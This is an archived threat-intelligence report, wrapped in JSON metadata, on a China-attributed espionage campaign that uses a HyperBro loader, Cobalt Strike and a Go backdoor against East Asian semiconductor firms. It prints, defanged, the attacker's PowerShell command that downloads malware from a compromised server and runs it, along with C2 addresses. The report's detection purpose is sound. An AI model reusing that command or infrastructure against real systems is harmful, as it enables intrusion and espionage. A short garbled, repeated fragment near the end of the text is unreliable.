{ "id": "30709abc-6e39-400d-be5b-4d2466b9a7da", "created_at": "2026-04-06T00:16:17.291482Z", "updated_at": "2026-04-10T03:36:06.799307Z", "deleted_at": null, "sha1_hash": "29b89bf0badf1497f496ad30ad9c25d67b5f650a", "title": "Chinese State-Sponsored Cyber Espionage Activity Targeting Semiconductor Industry in East Asia", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1763067, "plain_text": "Chinese State-Sponsored Cyber Espionage Activity Targeting\r\nSemiconductor Industry in East Asia\r\nArchived: 2026-04-05 17:06:33 UTC\r\nExecutive Summary \r\nEclecticIQ analysts identified a cyber espionage campaign where threat actors used a variant of HyperBro loader with a\r\nTaiwan Semiconductor Manufacturing (TSMC) lure, likely to target the semiconductor industry in Mandarin/Chinese\r\nspeaking East Asian regions (Taiwan, Hong Kong, Singapore). Operational tactics, techniques, and procedures (TTPs)\r\noverlap with previously reported activities attributed to People's Republic of China (PRC) backed cyber espionage\r\ngroup. \r\nThe HyperBro loader variant leverages a digitally signed CyberArk binary for DLL-Side loading, resulting in in-memory execution of a Cobalt Strike beacon. [1] Pivoting the beacon, EclecticIQ analysts identified a previously\r\nundocumented malware downloader. This downloader utilizes the BitsTransfer module in PowerShell to fetch\r\nmalicious binaries from a very likely compromised Cobra DocGuard server.  \r\nThe malware downloader employs a DLL Side-Loading technique by using a signed McAfee binary, mcods.exe, to run\r\nthe Cobalt Strike shellcode. Analysts identified that the shellcode used the same Cobalt Strike C2 server associated\r\nwith the HyperBro loader variant. \r\nThe compromised Cobra DocGuard web server hosted a GO-based backdoor that EclecticIQ tracks as\r\n“ChargeWeapon”. The backdoor was very likely uploaded by the same threat actor on August 21, 2023 [2].\r\nChargeWeapon is designed to get remote access and send device and network information from an infected host to an\r\nattacker controlled C2 server.   \r\nhttps://blog.eclecticiq.com/chinese-state-sponsored-cyber-espionage-activity-targeting-semiconductor-industry-in-east-asia\r\nPage 1 of 14\n\nFigure 1 - Graph view in EclecticIQ Intelligence Center\r\n(click on image to open in separate tab).\r\nHyperBro Loader Utilizing DLL Side-Loading to Execute Cobalt Strike Beacon    \r\nEclecticIQ analysts discovered that a threat actor used the variant of HyperBro loader for in-memory execution of\r\nCobalt Strike beacon by leveraging a legitimated and digitally signed binary from CyberArk’s vfhost.exe. Cobalt Strike\r\nis a commercial adversary simulation software that is marketed to Red Teams but is also stolen and actively used by a\r\nwide range of threat actors from ransomware operators to espionage-focused Advanced Persistent Threats (APTs). \r\nFigure 2 - HyperBro loader executable\r\nmasqueraded as ZIP file.\r\nDLL side-loading attacks use the DLL search order mechanism in Windows to plant and invoke a legitimate\r\napplication that executes a malicious DLL payload. Threat actors commonly use this technique for persistence and\r\ndefense evasion. \r\nhttps://blog.eclecticiq.com/chinese-state-sponsored-cyber-espionage-activity-targeting-semiconductor-industry-in-east-asia\r\nPage 2 of 14\n\nAfter successful execution of the HyperBro loader variant (VFTRACE.dll), the DLL decrypts bin.config that contains\r\nXOR encrypted Cobalt Strike shellcode. The shellcode loads into vfhost.exe.Notably, malicious files were written into\r\nC:\\ProgramData and VFTRACE.dll contains  thePDB file path: C:\\Users\\xdd\\Desktop\\今天\\0.直接装载\r\n\\VFTRACE\\Release\\VFTRACE.pdb. \r\nFigure 3 – DLL Side loading of HyperBro\r\nloader variant (VFTRACE.dll).\r\nThe shellcode decryption routine uses a one-byte length key (0x01) to decrypt the XOR-encrypted Cobalt Strike\r\npayload. The same routine was used in older versions of HyperBro loader.[3] This technique was used for evasion of\r\nsignature-based malware detection. The obfuscation is rather simple, yet it creates low entropy due to the one-byte key,\r\nwhich means low detection rate against anti malware scanners. \r\nFigure 4 – Disassembled HyperBro loader variant\r\nhttps://blog.eclecticiq.com/chinese-state-sponsored-cyber-espionage-activity-targeting-semiconductor-industry-in-east-asia\r\nPage 3 of 14\n\nVFTRACE.dll and XOR decryption routine. \r\nEclecticIQ analysts extracted the command-and-control IP address 38[.]54[.]119[.]239 from the Cobalt Strike\r\nshellcode. Analysis showed that the threat actor used a Malleable command and control (Malleable C2) profile to\r\ndisguise itself as jQuery CDN. A Malleable C2 profile specifies how the beacon will transform and store data in a\r\ntransaction to its C2 server. This technique is used for evasion of traditional firewall defenses [4]. \r\nFigure 5 – Extracted config file from\r\nCobalt Strike shellcode. \r\nThe threat actor used a TSMC-themed PDF as a decoy, displayed after the execution of the HyperBro loader. The lure\r\nis written in traditional Mandarin, which is spoken in Hong Kong and Taiwan, possibly indicating an intention to target\r\nnon-mainland Chinese speakers. This social engineering tactic is used to mislead the victim. By presenting a normal\r\nlooking PDF while covertly running malware in the background, the chances of the victim growing suspicious are\r\nminimized. \r\nhttps://blog.eclecticiq.com/chinese-state-sponsored-cyber-espionage-activity-targeting-semiconductor-industry-in-east-asia\r\nPage 4 of 14\n\nFigure 6 – PDF document in Mandarin named\r\n“Taiwan Semiconductor Manufacturing”. \r\nCompromised Cobra DocGuard Web Server Abused for Second Stage Malware\r\nDelivery \r\nEclecticIQ analysts identified an undocumented malware downloader that was used by the threat actor to deploy\r\nCobalt Strike shellcode. After successful infection, it downloads the encrypted Cobalt Strike shellcode bin.config ,\r\nMcAfee binary mcods.exe and a generic loader mcvsocfg.dll from a very likely compromised Cobra DocGuard web\r\nserver at 154[.]93[.]7[.]99. Cobra DocGuard is a software developed by a Chinese company called EsafeNet and used\r\nto protect, encrypt, and decrypt software or files. The downloaded binaries were used to decrypt and execute Cobalt\r\nStrike shellcode via DLL Side loading technique.  \r\nThe Cobalt Strike beacon uses the same C2 address 38[.]54[.]119[.]239 that was detected in the HyperBro loader\r\nvariant. Analysts assess with high confidence that the malware downloader was likely used by the same threat actor\r\nbecause it uses the same C2 server IP with the same Malleable C2 profile. In addition, the HyperBro loader variant and\r\nthe malware downloader were uploaded to Virus Total in August 2023, within 13 days of each other [5] [6]. \r\n  \r\nhttps://blog.eclecticiq.com/chinese-state-sponsored-cyber-espionage-activity-targeting-semiconductor-industry-in-east-asia\r\nPage 5 of 14\n\nFigure 7 – Malware downloader uses the same C2\r\nserver seen in HyperBro loader.\r\nExcept for the downloading phase, this malware's Kill-Chain is very similar to that of HyperBro's. It differs in the\r\nroutine to decrypt the Cobalt Strike shellcode, and how it loads the shellcode via Windows NTAPI undocumented\r\nfunctions to increase anti malware evasion.  \r\nFigure 8 – Overlaps between HyperBro loader\r\nvariant and new malware downloader.\r\nThe code snippet below shows the PowerShell command line execution after the successful infection of the Cobalt\r\nStrike downloader:  \r\nStart-BitsTransfer -Source \"hxxp[://]154[.]93[.]7[.]99:8090/CDGServer3/images/zh/mcvsocfg[.]dll\" -Destination\r\n\"c:\\programdata\\mcvsocfg[.]dll\";Start-BitsTransfer -Source\r\n\"hxxp[://]154[.]93[.]7[.]99:8090/CDGServer3/images/zh/mcods[.]exe\" -Destination\r\n\"c:\\programdata\\mcods[.]exe\";Start-BitsTransfer -Source\r\nhttps://blog.eclecticiq.com/chinese-state-sponsored-cyber-espionage-activity-targeting-semiconductor-industry-in-east-asia\r\nPage 6 of 14\n\n\"hxxp[://]154[.]93[.]7[.]99:8090/CDGServer3/images/zh/bin[.]config\" -Destination \"c:\\programdata\\bin[.]config\";start\r\nc:\\programdata\\mcods[.]exe \r\nThe PowerShell was based64 encoded. It downloads malware artifacts and drops them under c:\\programdata of the\r\ninfected device. The threat actor used bin.conifg to store encrypted Cobalt Strike shellcode. Other malware artifacts\r\nlike mcods.exe and mcvsocfg.dll were used for decryption of Cobalt Strike shellcode and loading it via DLL side\r\nloading technique.  \r\nFigure 9 – Decryption routine of generic malware\r\ndownloader using 16-byte length XOR key.\r\nChargeWeapon – GO Language Based Backdoor   \r\nEclecticIQ analysts identified a new GO based backdoor that was uploaded on August 21, 2023, to the Cobra\r\nDocGuard web server 154[.]93[.]7[.]99 - likely by the same threat actor. EclecticIQ analysts named the backdoor\r\n“ChargeWeapon\" because of a string found in the malware code. \r\nThe file path C:/Users/xll is almost identical to the PDB path C:\\Users\\xdd\\ found in the HyperBro loader variant (see\r\nFigure 3). EclecticIQ analysts assess with high confidence that the attacker´s file path string D:/yuan/ was written into\r\nthe GO binary during compilation.\r\n \r\nhttps://blog.eclecticiq.com/chinese-state-sponsored-cyber-espionage-activity-targeting-semiconductor-industry-in-east-asia\r\nPage 7 of 14\n\nFigure 10 – ChargeWeapon string inside the\r\nGO based malware. \r\nUpon infection, ChargeWeapon begins transmitting data about the compromised host. Transmitted data is sent in JSON\r\nformat and obfuscated by base64 encoding. ChargeWeapon employs a POST request for command-and-control\r\ncommunication over 45[.]77[.]37[.]145:8443. A breakdown of the extracted data can be seen below: \r\nHostname \r\nIP address (Ipv4 and Ipv6 format)\r\nProcess tree \r\nThis information is very likely collected by threat actor to perform initial reconnaissance against infected hosts and\r\nidentifying high-value targets.  \r\nChargeWeapon uses the open-source obfuscation tool called \"garble\" to perform anti malware evasion [7]. At the time\r\nof this report, only four anti malware solutions have detected this malware variant in Virus Total.\r\nChargeWeapon capabilities: \r\nInteraction with remote device over Windows default command line interface.\r\nWindows Management Instrumentation (WMI) execution.\r\nBase64 obfuscation during C2 connection.\r\nTCP over HTTP C2.\r\nReading or writing files on infected host. \r\nThe disassembled version of ChargeWeapon shows the IP address of the C2 server and base64 encoding function when\r\nsending data to attacker.\r\nhttps://blog.eclecticiq.com/chinese-state-sponsored-cyber-espionage-activity-targeting-semiconductor-industry-in-east-asia\r\nPage 8 of 14\n\nFigure 11 – IP address of the C2 server\r\nused by ChargeWeapon. \r\nThe main function of ChargeWeapon is designed to send victim network and device data after the execution. \r\nFigure 12 – IP address of the C2 server\r\nused by ChargeWeapon. \r\nBelow is a list of GO libraries used by ChargeWeapon: \r\ngithub.com/shirou/gopsutil \r\ngithub.com/go-ole/ \r\ngithub.com/yusufpapurcu/wmi \r\ngolang.org/x/sys\r\nMethods of Operation Strongly Overlaps with People's Republic of China (PRC)\r\nBacked Nation-State Groups \r\nhttps://blog.eclecticiq.com/chinese-state-sponsored-cyber-espionage-activity-targeting-semiconductor-industry-in-east-asia\r\nPage 9 of 14\n\nEclecticIQ analysts assess with high confidence that the analyzed Hyperbro Loader, the malware downloader and the\r\nGO backdoor are very likely operated and developed by a PRC backed nation state threat actor, due to victimology,\r\ninfrastructure observed, malware code and resemblance with previously reported activity clusters.  \r\nIn August 2023, Recorded Future reported about a Chinese state-sponsored group dubbed RedHotel [8]. EclecticIQ's\r\nresearch shares the following similarities with the Recorded Future's analysis: \r\nThe PDB file path found in the HyperBro variants are almost identical.\r\nUse of Cobalt Strike and customized jQuery malleable C2 profile.\r\nThe DLL side loading technique via vfhost.exe.\r\nUsing hosting providers including AS-CHOOPA (Vultr) and Kaopu Cloud HK for C2 connection. \r\nIn October 2022, a report from Symantec stated that “Budworm has used the endpoint privilege management software\r\nCyberArk Viewfinity to perform side-loading. The binary, which has the default name vf_host.exe, is usually renamed\r\nby the attackers in order to masquerade as a more innocuous file. Masqueraded names included\r\nsecurityhealthservice.exe, secu.exe, vfhost.exe, vxhost.exe, vx.exe, and v.exe.” [9] \r\nAccording to researchers from Symantec, HyperBro is a malware strain seen in cyberattacks since 2018. It has been\r\nused by APT27 (aka Budworm, LuckyMouse) threat actor to enable the group to gain full control over targeted\r\nsystems. HyperBro malware family is often loaded using a technique known as dynamic-link library (DLL) side-loading. \r\nEclecticIQ observed the same DLL sideloading technique via the same CyberArk binary. However, in this new\r\ncampaign EclecticIQ analysts have not observed any further overlap with APT27 other than the abuse of DLL side\r\nloading through vfhost.exe.   \r\nThe malware downloader found in the Cobra DocGuard server was upload to Virus Total from Hong Kong. In August\r\n22,2023 report from Symantec stated that the Cobra DocGuard was exploited in a supply chain attacks for targeting\r\norganizations in Hong Kong. It is attributed by Symantec to APT group Carderbee. [10]   \r\nESET reported that in September 2022, a malicious update to the Cobra DocGuard software compromised a Hong\r\nKong-based gambling company. The same company was targeted in September 2021 using a similar method by\r\nAPT27. Due to this pattern, ESET believes that the September 2022 breach was also the work of APT27. [11] \r\nThe exploitation of Cobra DocGuard servers, and using it for malware delivery, overlaps with reports by Symantec and\r\nESET. This provides further evidence for attribution to People's Republic of China (PRC) backed nation-state APT\r\ngroups used similar infrastructure to target organizations in Hong Kong.  \r\nDetection and Prevention Strategies  \r\nMonitor for DLL side loading activities under C:\\ProgramData file path, that use binaries such as mcods.exe\r\nand vfhost.exe on Windows endpoints.    \r\nUse application whitelisting to block execution of any unsigned executable (EXE) from Windows endpoints and\r\nmonitor suspicious downloading attempt that use Start-BitsTransfer PowerShell cmdlet.  \r\nThreat actors are increasingly leveraging Windows PowerShell cmdlets to conduct their operations. Consider\r\nblocking the usage of PowerShell for regular Windows users. If that is not an option, EclecticIQ researchers\r\nhttps://blog.eclecticiq.com/chinese-state-sponsored-cyber-espionage-activity-targeting-semiconductor-industry-in-east-asia\r\nPage 10 of 14\n\nhighly recommend enabling PowerShell module and script logging via Windows Group Policy. Also,\r\nPowerShell Constrained Language Mode can be utilized to limit the attack surface of adversaries. \r\nIn this campaign threat actor consistently used same VPS hosting providers such as AS-CHOOPA (Vultr) and\r\nKaopu Cloud HK to perform their operations. Consider blocking or monitoring any downloading attempts from\r\nthis infrastructure. \r\nIndicator of compromise (IoC) \r\nHyperBro Loader \r\n12e1f50d7c9cf546c90545588bc369fa90e03f2370883e7befd87e4d50ebf0df \r\n7229bb62acc6feca55d05b82d2221be1ab0656431953012ebad7226adc63643b \r\ndf847abbfac55fb23715cde02ab52cbe59f14076f9e4bd15edbe28dcecb2a348 - (legitimate binary) \r\n45e7ce7b539bfb4f780c33faa1dff523463907ec793ff5d1e94204a8a6a00ab5 \r\ndf6dd612643a778dca8879538753b693df04b9cf02169d04183136a848977ce9 \r\nC2 IP: \r\nhttp://38[.]54[.]119[.]239:443/jquery-3.3.1.min.js \r\nChargeWeapon \r\n3195fe1a29d0d44c0eaec805a4769d506d03493816606f58ec49416d26ce5135 \r\nC2 IP: \r\n45[.]77[.]37[.]145:8443 \r\nGeneric Malware Downloader \r\nee66ebcbe872def8373a4e5ea23f14181ea04759ea83f01d2e8ff45d60c65e51 \r\ne26f8b8091bbe5c62b73f73b6c9c24c2a2670719cf24ef8772b496815c6a6ce0 - (loader module) \r\ne6bad7f19d3e76268a09230a123bb47d6c7238b6e007cc45c6bc51bb993e8b46 - (legitimate binary) \r\nce226bd1f53819d6654caf04a7bb4141479f01f9225ac6fba49248920e57cb25 \r\n56f94f1df0338d254d0421e7baf17527817607a60c6f9c71108e60a12d7d6dcf \r\nIP Address of second stage malware artifacts:  \r\n45[.]32[.]33[.]17 \r\n23[.]224[.]61[.]12 \r\nhxxp[://]154[.]93[.]7[.]99:8090/CDGServer3/images/zh/mcvsocfg[.]dll \r\nhxxp[://]154[.]93[.]7[.]99:8090/CDGServer3/images/zh/mcods[.]exe \r\nhxxp[://]154[.]93[.]7[.]99:8090/CDGServer3/images/zh/bin[.]config \r\nAppendix A - MITRE ATT\u0026CK Techniques\r\nExploit Public-Facing Application - T1190 \r\nObfuscated Files or Information - T1027 \r\nhttps://blog.eclecticiq.com/chinese-state-sponsored-cyber-espionage-activity-targeting-semiconductor-industry-in-east-asia\r\nPage 11 of 14\n\nIngress Tool Transfer - T1105 \r\nApplication Layer Protocol: Web Protocols - T1071.001 \r\nCommand and Scripting Interpreter: PowerShell - T1059.001 \r\nUser Execution: Malicious File - T1204.002 \r\nWindows Management Instrumentation - T1047 \r\nGather Victim Host Information - T1592 \r\nHijack Execution Flow: DLL Side-Loading - T1574.002 \r\nMasquerading: Match Legitimate Name or Location - T1036.005 \r\nDeobfuscate/Decode Files or Information - T1140 \r\nAppendix B - Yara Rule for The Detection of ChargeWeapon: \r\nrule RedHotel_ChargeWeapon_Sep22\r\n{\r\n    meta:\r\n        description = \"Detects RedHotel ChargeWeapon Backdoor\"\r\n        author = \"EclecticIQ Threat Research Team\"\r\n        creation_date = \"22.09.2023\"\r\n        classification = \"TLP:WHITE\"\r\n        hash_md5 = \"44ee43adc8f423db4a461fc99731cdb9\"    \r\n   strings:\r\n        $GoBuildId = /Go build ID: \\\"[a-zA-Z0-9\\/_-]{40,120}\\\"/\r\n        $YuanFilePath_1 = {00 44 3A 2F 79 75 61 6E 2F 67 6F 2F 43 68 61 72 67 65 57 65 61 70 6F 6E 2F 63 6C 69 65\r\n6E 74 2E 67 6F}\r\n        $YuanFilePath_2 = {2f 67 6f 2f 43 68 61 72 67 65 57 65 61 70 6f 6e 2f 63 6c 69 65 6e 74 2e 67 6f}\r\n        $YuanFilePath_3 = {43 3A 2F 55 73 65 72 73 2F 78 78 6C 2F 67 6F 2F}\r\n        $GoLibary1 = \"github.com/shirou/gopsutil\" ascii wide nocase\r\n        $GoLibary2 = \"github.com/go-ole/\" ascii wide nocase\r\nhttps://blog.eclecticiq.com/chinese-state-sponsored-cyber-espionage-activity-targeting-semiconductor-industry-in-east-asia\r\nPage 12 of 14\n\n$GoLibary3 = \"github.com/yusufpapurcu/wmi\" ascii wide nocase\r\n        $GoLibary4 = \"golang.org/x/sys\" ascii wide nocase    \r\n   condition:\r\n        (uint16(0) == 0x5a4d or uint32(0) == 0x7F454C46) and\r\n        any of ($YuanFilePath_*) and\r\n        #GoBuildId == 1 and\r\n        all of ($GoLibary*)\r\n}\r\nStructured Data\r\nFind this and other research in our public TAXII collection for easy use in your security stack:\r\nhttps://cti.eclecticiq.com/taxii/discovery.\r\nPlease refer to our support page for guidance on how to access the feeds.\r\nAbout EclecticIQ Intelligence \u0026 Research Team\r\nEclecticIQ is a global provider of threat intelligence, hunting, and response technology and services. Headquartered in\r\nAmsterdam, the EclecticIQ Intelligence \u0026 Research Team is made up of experts from Europe and the U.S. with\r\ndecades of experience in cyber security and intelligence in industry and government.\r\nWe would love to hear from you. Please send us your feedback by emailing us at research@eclecticiq.com.\r\nYou might also be interested in:\r\nDecrypting Key Group Ransomware: Emerging Financially Motivated Cyber Crime Gang\r\nMalware-as-a-Service: Redline Stealer Variants Demonstrate a Low-Barrier-to-Entry Threat\r\nGerman Embassy Lure: Likely Part of Campaign Against NATO Aligned Ministries of Foreign Affairs\r\nReferences\r\n[1] “Cobalt Strike (Malware Family).” Accessed: Sep. 22, 2023. [Online]. Available:\r\nhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike  \r\nhttps://blog.eclecticiq.com/chinese-state-sponsored-cyber-espionage-activity-targeting-semiconductor-industry-in-east-asia\r\nPage 13 of 14\n\n[2] “VirusTotal - File - 3195fe1a29d0d44c0eaec805a4769d506d03493816606f58ec49416d26ce5135.” Accessed: Sep.\r\n21, 2023. [Online]. Available:\r\nhttps://www.virustotal.com/gui/file/3195fe1a29d0d44c0eaec805a4769d506d03493816606f58ec49416d26ce5135/detection\r\n \r\n[3] “Examining APT27 and the HyperBro RAT,” RSA Link. Accessed: Sep. 21, 2023. [Online]. Available:\r\nhttps://community.netwitness.com/t5/netwitness-community-blog/examining-apt27-and-the-hyperbro-rat/ba-p/693490  \r\n[4] C. N. Shibiraj Durgesh Sangvikar, Andrew Guan, Yu Fu, Yanhui Jia, Siddhart, “Cobalt Strike Analysis and Tutorial:\r\nHow Malleable C2 Profiles Make Cobalt Strike Difficult to Detect,” Unit 42. Accessed: Sep. 21, 2023. [Online].\r\nAvailable: https://unit42.paloaltonetworks.com/cobalt-strike-malleable-c2-profile/  \r\n[5] “VirusTotal - File - ee66ebcbe872def8373a4e5ea23f14181ea04759ea83f01d2e8ff45d60c65e51.” Accessed: Sep.\r\n21, 2023. [Online]. Available:\r\nhttps://www.virustotal.com/gui/file/ee66ebcbe872def8373a4e5ea23f14181ea04759ea83f01d2e8ff45d60c65e51/relations\r\n \r\n[6] “VirusTotal - File - 12e1f50d7c9cf546c90545588bc369fa90e03f2370883e7befd87e4d50ebf0df.” Accessed: Sep.\r\n21, 2023. [Online]. Available:\r\nhttps://www.virustotal.com/gui/file/12e1f50d7c9cf546c90545588bc369fa90e03f2370883e7befd87e4d50ebf0df/details\r\n \r\n[7] “garble.” burrowers, Sep. 21, 2023. Accessed: Sep. 21, 2023. [Online]. Available:\r\nhttps://github.com/burrowers/garble  \r\n[8] “RedHotel A Prolific, Chinese State-Sponsored Grou.pdf.” Accessed: Sep. 21, 2023. [Online]. Available:\r\nhttps://go.recordedfuture.com/hubfs/reports/cta-2023-0808.pdf  \r\n[9] “Budworm: Espionage Group Returns to Targeting U.S. Organizations.” Accessed: Sep. 21, 2023. [Online].\r\nAvailable: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/budworm-espionage-us-state  \r\n[10] “Carderbee: APT Group use Legit Software in Supply Chain Attack Targeting Orgs in Hong Kong | Symantec\r\nEnterprise Blogs.” Accessed: Sep. 22, 2023. [Online]. Available: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/carderbee-software-supply-chain-certificate-abuse  \r\n[11] “eset_apt_activity_report_t32022.pdf.” Accessed: Sep. 21, 2023. [Online]. Available: https://web-assets.esetstatic.com/wls/2023/01/eset_apt_activity_report_t32022.pdf  \r\nSource: https://blog.eclecticiq.com/chinese-state-sponsored-cyber-espionage-activity-targeting-semiconductor-industry-in-east-asia\r\nhttps://blog.eclecticiq.com/chinese-state-sponsored-cyber-espionage-activity-targeting-semiconductor-industry-in-east-asia\r\nPage 14 of 14\n\nvariant. Analysts because it uses assess with the same C2 high confidence server IP with that the malware the same Malleable downloader C2 profile. In was likely used addition, the HyperBro by the same threat loader actor variant and\nthe malware downloader were uploaded to Virus Total in August 2023, within 13 days of each other [5] [6].\n Page 5 of 14", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia", "MISPGALAXY" ], "references": [ "https://blog.eclecticiq.com/chinese-state-sponsored-cyber-espionage-activity-targeting-semiconductor-industry-in-east-asia" ], "report_names": [ "chinese-state-sponsored-cyber-espionage-activity-targeting-semiconductor-industry-in-east-asia" ], "threat_actors": [ { "id": "610a7295-3139-4f34-8cec-b3da40add480", "created_at": "2023-01-06T13:46:38.608142Z", "updated_at": "2026-04-10T02:00:03.03764Z", "deleted_at": null, "main_name": "Cobalt", "aliases": [ "Cobalt Group", "Cobalt Gang", "GOLD KINGSWOOD", "COBALT SPIDER", "G0080", "Mule Libra" ], "source_name": "MISPGALAXY:Cobalt", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12", "created_at": "2023-01-06T13:46:39.396409Z", "updated_at": "2026-04-10T02:00:03.312816Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "CHROMIUM", "ControlX", "TAG-22", "BRONZE UNIVERSITY", "AQUATIC PANDA", "RedHotel", "Charcoal Typhoon", "Red Scylla", "Red Dev 10", "BountyGlad" ], "source_name": "MISPGALAXY:Earth Lusca", "tools": [ "RouterGod", "SprySOCKS", "ShadowPad", "POISONPLUG", "Barlaiy", "Spyder", "FunnySwitch" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "6a0effeb-3ee2-4a67-9a9f-ef5c330b1c3a", "created_at": "2023-09-07T02:02:47.827633Z", "updated_at": "2026-04-10T02:00:04.873323Z", "deleted_at": null, "main_name": "RedHotel", "aliases": [ "Operation FishMedley", "RedHotel", "TAG-22" ], "source_name": "ETDA:RedHotel", "tools": [ "Agentemis", "BIOPASS", "BIOPASS RAT", "BleDoor", "Brute Ratel", "Brute Ratel C4", "Cobalt Strike", "CobaltStrike", "FunnySwitch", "POISONPLUG.SHADOW", "RbDoor", "RibDoor", "RouterGod", "ShadowPad Winnti", "SprySOCKS", "Spyder", "Winnti", "XShellGhost", "cobeacon" ], "source_id": "ETDA", "reports": null }, { "id": "e3492534-85a6-4c87-a754-5ae4a56d7c8c", "created_at": "2022-10-25T15:50:23.819113Z", "updated_at": "2026-04-10T02:00:05.354598Z", "deleted_at": null, "main_name": "Threat Group-3390", "aliases": [ "Threat Group-3390", "Earth Smilodon", "TG-3390", "Emissary Panda", "BRONZE UNION", "APT27", "Iron Tiger", "LuckyMouse", "Linen Typhoon" ], "source_name": "MITRE:Threat Group-3390", "tools": [ "Systeminfo", "gsecdump", "PlugX", "ASPXSpy", "Cobalt Strike", "Mimikatz", "Impacket", "gh0st RAT", "certutil", "China Chopper", "HTTPBrowser", "Tasklist", "netstat", "SysUpdate", "HyperBro", "ZxShell", "RCSession", "ipconfig", "Clambling", "pwdump", "NBTscan", "Pandora", "Windows Credential Editor" ], "source_id": "MITRE", "reports": null }, { "id": "e737c474-a1f2-4e18-9d78-1c00f0887fa0", "created_at": "2023-11-05T02:00:08.085728Z", "updated_at": "2026-04-10T02:00:03.401539Z", "deleted_at": null, "main_name": "Carderbee", "aliases": [], "source_name": "MISPGALAXY:Carderbee", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "c63ab035-f9f2-4723-959b-97a7b98b5942", "created_at": "2023-01-06T13:46:38.298354Z", "updated_at": "2026-04-10T02:00:02.917311Z", "deleted_at": null, "main_name": "APT27", "aliases": [ "BRONZE UNION", "Circle Typhoon", "Linen Typhoon", "TEMP.Hippo", "Budworm", "Lucky Mouse", "G0027", "GreedyTaotie", "Red Phoenix", "Iron Tiger", "Iron Taurus", "Earth Smilodon", "TG-3390", "EMISSARY PANDA", "Group 35", "ZipToken" ], "source_name": "MISPGALAXY:APT27", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "17cfc7a6-c8f2-4806-b77f-ba23fb772e70", "created_at": "2023-09-07T02:02:47.182792Z", "updated_at": "2026-04-10T02:00:04.604605Z", "deleted_at": null, "main_name": "Carderbee", "aliases": [], "source_name": "ETDA:Carderbee", "tools": [ "Agent.dhwf", "Cobra DocGuard", "Destroy RAT", "DestroyRAT", "Kaba", "Korplug", "PlugX", "RedDelta", "Sogu", "TIGERPLUG", "TVT", "Thoper", "Xamtrav" ], "source_id": "ETDA", "reports": null }, { "id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7", "created_at": "2025-08-07T02:03:24.688416Z", "updated_at": "2026-04-10T02:00:03.734754Z", "deleted_at": null, "main_name": "BRONZE UNIVERSITY", "aliases": [ "Aquatic Panda", "Aquatic Panda ", "CHROMIUM", "CHROMIUM ", "Charcoal Typhoon", "Charcoal Typhoon ", "Earth Lusca", "Earth Lusca ", "FISHMONGER ", "Red Dev 10", "Red Dev 10 ", "Red Scylla", "Red Scylla ", "RedHotel", "RedHotel ", "Tag-22", "Tag-22 " ], "source_name": "Secureworks:BRONZE UNIVERSITY", "tools": [ "Cobalt Strike", "Fishmaster", "FunnySwitch", "Spyder", "njRAT" ], "source_id": "Secureworks", "reports": null }, { "id": "b399b5f1-42d3-4b53-8c73-d448fce6ab43", "created_at": "2025-08-07T02:03:24.68371Z", "updated_at": "2026-04-10T02:00:03.64323Z", "deleted_at": null, "main_name": "BRONZE UNION", "aliases": [ "APT27 ", "Bowser", "Budworm ", "Circle Typhoon ", "Emissary Panda ", "Group35", "Iron Tiger ", "Linen Typhoon ", "Lucky Mouse ", "TG-3390 ", "Temp.Hippo " ], "source_name": "Secureworks:BRONZE UNION", "tools": [ "AbcShell", "China Chopper", "EAGERBEE", "Gh0st RAT", "OwaAuth", "PhantomNet", "PoisonIvy", "Sysupdate", "Wonknu", "Wrapikatz", "ZxShell", "reGeorg" ], "source_id": "Secureworks", "reports": null }, { "id": "5c13338b-eaed-429a-9437-f5015aa98276", "created_at": "2022-10-25T16:07:23.582715Z", "updated_at": "2026-04-10T02:00:04.675765Z", "deleted_at": null, "main_name": "Emissary Panda", "aliases": [ "APT 27", "ATK 15", "Bronze Union", "Budworm", "Circle Typhoon", "Earth Smilodon", "Emissary Panda", "G0027", "Group 35", "Iron Taurus", "Iron Tiger", "Linen Typhoon", "LuckyMouse", "Operation DRBControl", "Operation Iron Tiger", "Operation PZChao", "Operation SpoiledLegacy", "Operation StealthyTrident", "Red Phoenix", "TEMP.Hippo", "TG-3390", "ZipToken" ], "source_name": "ETDA:Emissary Panda", "tools": [ "ASPXSpy", "ASPXTool", "Agent.dhwf", "AngryRebel", "Antak", "CHINACHOPPER", "China Chopper", "Destroy RAT", "DestroyRAT", "FOCUSFJORD", "Farfli", "Gh0st RAT", "Ghost RAT", "HTTPBrowser", "HTran", "HUC Packet Transmit Tool", "HighShell", "HttpBrowser RAT", "HttpDump", "HyperBro", "HyperSSL", "HyperShell", "Kaba", "Korplug", "LOLBAS", "LOLBins", "Living off the Land", "Mimikatz", "Moudour", "Mydoor", "Nishang", "OwaAuth", "PCRat", "PlugX", "ProcDump", "PsExec", "RedDelta", "SEASHARPEE", "Sensocode", "SinoChopper", "Sogu", "SysUpdate", "TIGERPLUG", "TVT", "Thoper", "Token Control", "TokenControl", "TwoFace", "WCE", "Windows Credential Editor", "Windows Credentials Editor", "Xamtrav", "ZXShell", "gsecdump", "luckyowa" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434577, "ts_updated_at": 1775792166, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/29b89bf0badf1497f496ad30ad9c25d67b5f650a.pdf", "text": "https://archive.orkl.eu/29b89bf0badf1497f496ad30ad9c25d67b5f650a.txt", "img": "https://archive.orkl.eu/29b89bf0badf1497f496ad30ad9c25d67b5f650a.jpg" } }